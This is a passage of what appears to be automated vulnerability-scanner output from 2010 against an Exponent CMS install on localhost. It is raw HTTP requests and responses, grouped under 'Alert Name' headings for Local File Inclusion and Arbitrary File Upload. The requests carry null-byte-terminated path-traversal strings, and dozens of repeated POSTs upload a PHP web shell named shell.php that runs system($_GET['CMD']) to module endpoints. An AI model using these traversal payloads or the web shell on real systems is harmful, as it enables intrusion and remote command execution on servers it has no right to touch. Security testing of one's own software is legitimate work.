2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00 HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 181 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="expid" ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../lfi_test.txt ------x-- HTTP/1.0 500 Internal Server Error Date: Fri, 08 Oct 2010 22:19:05 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Set-Cookie: PHPSESSID=hg9b6bmveecc9menl3979vkds4; expires=Sun, 16-Jan-2011 22:19:05 GMT; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 11 Connection: close Content-Type: text/html LFI_Test123 ---------------------------------------------------------------- Alert Name: Local File Inclusion POST /exponent/install/popup.php?printerfriendly=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&expid=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&action=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00§ion=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&ajax_action=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&page=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00 HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 181 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="expid" ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../lfi_test.txt ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:25:16 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Set-Cookie: PHPSESSID=eauplretkr2i9gnq1p0p9o1tc4; expires=Sun, 16-Jan-2011 22:25:16 GMT; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 496 Content-Type: text/html Exponent CMS : Install Wizard ---------------------------------------------------------------- Alert Name: Arbitrary File Upload POST /exponent/modules/cermi/actions/upload_fileuploadcontrol.php?action=shell.php&expid=shell.php&ajax_action=shell.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 257 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="expid" shell.php ------x Content-Disposition: form-data; name="file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 302 Found Date: Fri, 08 Oct 2010 22:26:46 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Set-Cookie: PHPSESSID=qibu8pjokmuhdr5vq5fu2kjno0; expires=Sun, 16-Jan-2011 22:26:46 GMT; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Location: http://localhost/exponent/modules/cermi/actions/fileuploadcontrol.php?id=0 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/cermi/actions/upload_fileuploadcontrol.php?expid=shell.php&ajax_action=shell.php&printerfriendly=shell.php&action=shell.php§ion=shell.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 466 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="expid" shell.php ------x Content-Disposition: form-data; name="name" shell.php ------x Content-Disposition: form-data; name="item_type" shell.php ------x Content-Disposition: form-data; name="item_id" shell.php ------x Content-Disposition: form-data; name="file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:26:46 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Set-Cookie: PHPSESSID=bhnh2brn6ee7q4rp0qo1vj3ol3; expires=Sun, 16-Jan-2011 22:26:46 GMT; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 85 Content-Type: text/html Unable to upload "shell.php" to the server
The file already exists on the server ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/cermi/actions/upload_standalone.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:26:47 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/categories/manifest.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:26:47 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/categories/manifest.php?action=shell.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:26:47 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/categories/manifest.php?action=shell.php&ajax_action=shell.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:26:47 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/categories/actions/delete.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:26:48 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/categories/actions/edit.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:26:48 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/categories/actions/manage.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:26:48 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/categories/actions/rank_switch.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:26:48 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/categories/actions/save.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:26:49 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/categories/actions/save.php?expid=shell.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 263 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="expid" shell.php ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:26:49 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/categories/actions/view.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:26:49 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/calendarmodule/class.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:26:49 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/calendarmodule/deps.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:26:49 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/calendarmodule/deps.php?action=shell.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:26:50 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/calendarmodule/manifest.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:26:50 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/calendarmodule/actions/delete.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:26:50 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/calendarmodule/actions/delete_form.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:26:50 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/calendarmodule/actions/delete_form.php?printerfriendly=shell.php&action=shell.php§ion=shell.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:26:50 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/calendarmodule/actions/delete_process.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:26:51 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/calendarmodule/actions/edit.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:26:51 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/calendarmodule/actions/save.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:26:51 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/calendarmodule/actions/search.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:26:51 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/calendarmodule/actions/send_feedback.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:26:51 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/calendarmodule/actions/view.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:26:52 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/calendarmodule/actions/viewday.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:26:52 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/calendarmodule/actions/viewmonth.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:26:52 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/calendarmodule/actions/viewweek.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; 